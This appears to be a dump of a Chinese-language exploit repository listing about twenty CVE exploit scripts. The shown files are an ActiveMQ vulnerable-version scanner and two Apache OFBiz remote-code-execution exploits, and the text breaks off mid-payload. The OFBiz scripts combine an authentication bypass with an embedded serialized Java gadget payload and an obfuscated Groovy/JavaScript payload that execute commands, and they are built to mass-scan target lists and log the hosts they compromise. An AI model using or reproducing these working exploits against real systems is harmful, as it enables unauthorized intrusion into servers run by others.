├── ActiveMQ_RCE_Vulnerability_Checker.py
├── Apache-OFBiz_CVE-2023-49070_Exploit.py
├── Apache-OFBiz_CVE-2023-51467_Exploit.py
├── Cellular_rce_exp.py
├── Confluence_CVE-2023-22515_Checker.py
├── Confluence_CVE-2023-22517_Exploit.py
├── Jorani_CVE-2023-26469_exp.py
├── LGSimpleEdiotr_CVE-2023-40498_exploit.py
├── Liferay_CVE-2020-7961_Exploit.py
├── Liferay_CVE-2020-7961_Exploit_v4.py
├── OwnCloud_CVE-2023-49105_Exploit.py
├── QNAP-NAS_CVE-2024-21889_Exploit.py
├── QNAP_CVE-2019-7192_Exploit.py
├── README.md
├── WiseGigaNAS_rce_exploit.py
├── WordPress_plugin_SupportCandy_CVE-2023-1730_exploit.py
├── citrix_CVE-2023-4966_exploit.py
├── f5_CVE-2023-46747_exploit.py
├── juniper-cve-2023-36845.py
└── openfire_CVE-2023-32315_exploit.py
/ActiveMQ_RCE_Vulnerability_Checker.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-10-26
3 |
4 | import socket
5 | import socks
6 | import re
7 | from distutils.version import StrictVersion
8 | import argparse
9 | import threading
10 | import warnings
11 | warnings.filterwarnings("ignore", category=DeprecationWarning)
12 |
13 | def extract_ip_port_from_url(url):
14 | url = url.replace("http://", "").replace("https://", "")
15 |
16 | parts = url.split(":")
17 | if len(parts) == 2:
18 | ip, port = parts[0], parts[1]
19 | return ip, int(port)
20 | else:
21 | print(f"无法解析 URL:{url}")
22 | return None, None
23 |
24 | def check_for_vulnerability(ip, port, proxies={}, success_file=None):
25 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
26 | sock.connect((ip, port))
27 | sock.settimeout(10)
28 |
29 | try:
30 | response_data = sock.recv(1024)
31 |
32 | version_match = re.search(r'ProviderVersion.*?([\d.]+)',response_data.decode('unicode_escape'))
33 |
34 | if version_match:
35 | version_str = version_match.group(1)
36 | current_version = StrictVersion(version_str)
37 |
38 | if (StrictVersion('5.18.0') <= current_version < StrictVersion('5.18.3')) or (current_version < StrictVersion('5.17.6')):
39 | with open(success_file, 'a') as s_file:
40 | s_file.write(f"++++++++++++++++++\n")
41 | s_file.write(f"目标URL: {ip}:{port}\n")
42 | s_file.write(f"漏洞版本: {current_version}\n\n")
43 | else:
44 | print(f'在 {ip}:{port} 的响应中找不到 ActiveMQ 提供程序版本')
45 | except Exception as e:
46 | print(f"发生异常:{e}")
47 | finally:
48 | sock.close()
49 |
50 | def scan_targets(urls, proxies={}, success_file=None):
51 | for url in urls:
52 | url = url.strip()
53 | ip, port = extract_ip_port_from_url(url)
54 | if ip is not None and port is not None:
55 | check_for_vulnerability(ip, port, proxies, success_file)
56 |
57 | def multi_threaded_scan(urls, proxies={}, success_file=None, num_threads=4):
58 | threads = []
59 | for i in range(num_threads):
60 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
61 | threads.append(thread)
62 |
63 | for thread in threads:
64 | thread.start()
65 |
66 | for thread in threads:
67 | thread.join()
68 |
69 | if __name__ == '__main__':
70 | parser = argparse.ArgumentParser(description="Apache ActiveMQ (版本 < 5.18.3) 漏洞版本检测")
71 | parser.add_argument("-u", "--url", help="目标URL")
72 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
73 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
74 | args = parser.parse_args()
75 |
76 | if not args.url and not args.file:
77 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
78 | exit(1)
79 |
80 | if args.url:
81 | urls = [args.url]
82 | elif args.file:
83 | with open(args.file, 'r') as file:
84 | urls = file.readlines()
85 |
86 | proxies = {}
87 | success_file = 'success_targets.txt'
88 |
89 | multi_threaded_scan(urls, proxies, success_file, args.threads)
90 |
91 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
92 |
--------------------------------------------------------------------------------
/Apache-OFBiz_CVE-2023-49070_Exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-12-08
3 |
4 | import requests
5 | import argparse
6 | import threading
7 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
8 |
9 | def check_for_vulnerability(url, proxies=None, success_file=None):
10 | try:
11 | vulnurl = url+"/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y"
12 | headers = {
13 | "cmd": "id"
14 | }
15 | data = '''
16 |
17 | RCE
18 |
19 |
20 |
21 |
22 |
23 | RCE
24 |
25 | rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAFK3K/rq+AAAAMwEFCgBFAIkKAIoAiwoAigCMCgAdAI0IAHoKABsAjgoAjwCQCgCPAJEHAHsKAIoAkggAkwoAIACUCACVCACWBwCXCACYCABYBwCZCgAbAJoIAJsIAHAHAJwLABYAnQsAFgCeCABnCACfBwCgCgAbAKEHAKIKAKMApAgApQcApggApwoAIACoCACpCQAlAKoHAKsKACUArAgArQoArgCvCgAgALAIALEIALIIALMIALQIALUHALYHALcKADAAuAoAMAC5CgC6ALsKAC8AvAgAvQoALwC+CgAvAL8KACAAwAgAwQoAGwDCCgAbAMMIAMQHAGQKABsAxQgAxgcAxwgAyAgAyQcAygcBAwcAzAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAsTHlzb3NlcmlhbC9wYXlsb2Fkcy90ZW1wbGF0ZXMvVG9tY2F0Q21kRWNobzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAzQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAANjbHMBABFMamF2YS9sYW5nL0NsYXNzOwEABHZhcjUBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQABdAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAA3N0cgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBAA1TdGFja01hcFRhYmxlBwDOBwDPBwDQBwCmBwCiBwCZBwCcBwBiBwDHBwDKAQAKU291cmNlRmlsZQEAElRvbWNhdENtZEVjaG8uamF2YQwARgBHBwDQDADRANIMANMA1AwA1QDWDADXANgHAM8MANkA2gwA2wDcDADdAN4BAARleGVjDADfAOABAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADhANYBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwA4gDjDADbAOQBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwA5QDmAQAQamF2YS9sYW5nL09iamVjdAcA5wwA6ADpAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwA6gDrAQAJc2V0U3RhdHVzDADsAF4BABFqYXZhL2xhbmcvSW50ZWdlcgwARgDtAQAHb3MubmFtZQcA7gwA7wDwDADxAN4BAAN3aW4BAAdjbWQuZXhlAQACL2MBAAkvYmluL2Jhc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABGAPIMAPMA9AcA9QwA9gD3DABGAPgBAAJcQQwA+QD6DAD7AN4MAPwA/QEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwA/gD/DAEAAQEBAAhzZXRCeXRlcwwBAgDmAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24BACp5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzRW1wdHkBAAMoKVoBAARUWVBFAQAEKEkpVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9T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
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 | '''
35 | res = requests.post(vulnurl, headers=headers, data=data, verify=False, timeout=30)
36 | res.encoding = "utf-8"
37 | if res.status_code == 200 and "uid=" in res.text:
38 | print(f"目标URL: {url} ")
39 | with open(success_file, 'a') as s_file:
40 | s_file.write(f"++++++++++++++++++\n")
41 | s_file.write(f"目标URL: {url}\n")
42 | s_file.write("响应内容: {}\n\n".format(res.text.split('\n')[0]))
43 | return True
44 | except Exception as e:
45 | print(f"发生异常:{e}")
46 | return False
47 |
48 | def scan_targets(targets, proxies=None, success_file=None):
49 | for target in targets:
50 | target = target.strip()
51 | check_for_vulnerability(target, proxies, success_file)
52 |
53 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
54 | threads = []
55 |
56 | for i in range(num_threads):
57 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
58 | threads.append(thread)
59 |
60 | for thread in threads:
61 | thread.start()
62 |
63 | for thread in threads:
64 | thread.join()
65 |
66 | if __name__ == '__main__':
67 | parser = argparse.ArgumentParser(description="Apache OFBiz XML-RPC代码执行漏洞CVE-2023-49070")
68 | parser.add_argument("-u", "--url", help="目标URL")
69 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
70 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
71 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
72 | args = parser.parse_args()
73 |
74 | if not args.url and not args.file:
75 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
76 | exit(1)
77 |
78 | if args.url:
79 | urls = [args.url]
80 | elif args.file:
81 | with open(args.file, 'r') as file:
82 | urls = file.readlines()
83 |
84 | success_file = 'success_targets.txt'
85 |
86 | proxies = {
87 | "http": args.proxy,
88 | "https": args.proxy
89 | } if args.proxy else None
90 |
91 | multi_threaded_scan(urls, proxies, success_file, args.threads)
92 |
93 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
94 |
--------------------------------------------------------------------------------
/Apache-OFBiz_CVE-2023-51467_Exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-12-30
3 |
4 | import requests
5 | import argparse
6 | import threading
7 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
8 |
9 | def check_for_vulnerability(url, proxies=None, success_file=None):
10 | try:
11 | vulnurl = url+"/webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y"
12 | headers = {
13 | "cmd": "id",
14 | "Content-Type": "application/x-www-form-urlencoded",
15 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
16 | }
17 | payload = {"groovyProgram": r"\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u0078\u002e\u0073\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0063\u0072\u0069\u0070\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u004d\u0061\u006e\u0061\u0067\u0065\u0072\u0028\u0029\u002e\u0067\u0065\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u0042\u0079\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0073\u0022\u0029\u002e\u0065\u0076\u0061\u006c\u0028\u0022\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u006c\u006f\u0061\u0064\u0028\u005c\u0022\u006e\u0061\u0073\u0068\u006f\u0072\u006e\u003a\u006d\u006f\u007a\u0069\u006c\u006c\u0061\u005f\u0063\u006f\u006d\u0070\u0061\u0074\u002e\u006a\u0073\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0029\u0020\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0055\u006e\u0073\u0061\u0066\u0065\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0020\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0067\u0065\u0074\u0028\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u0063\u006c\u0061\u007a\u007a\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0043\u006c\u0061\u0073\u0073\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020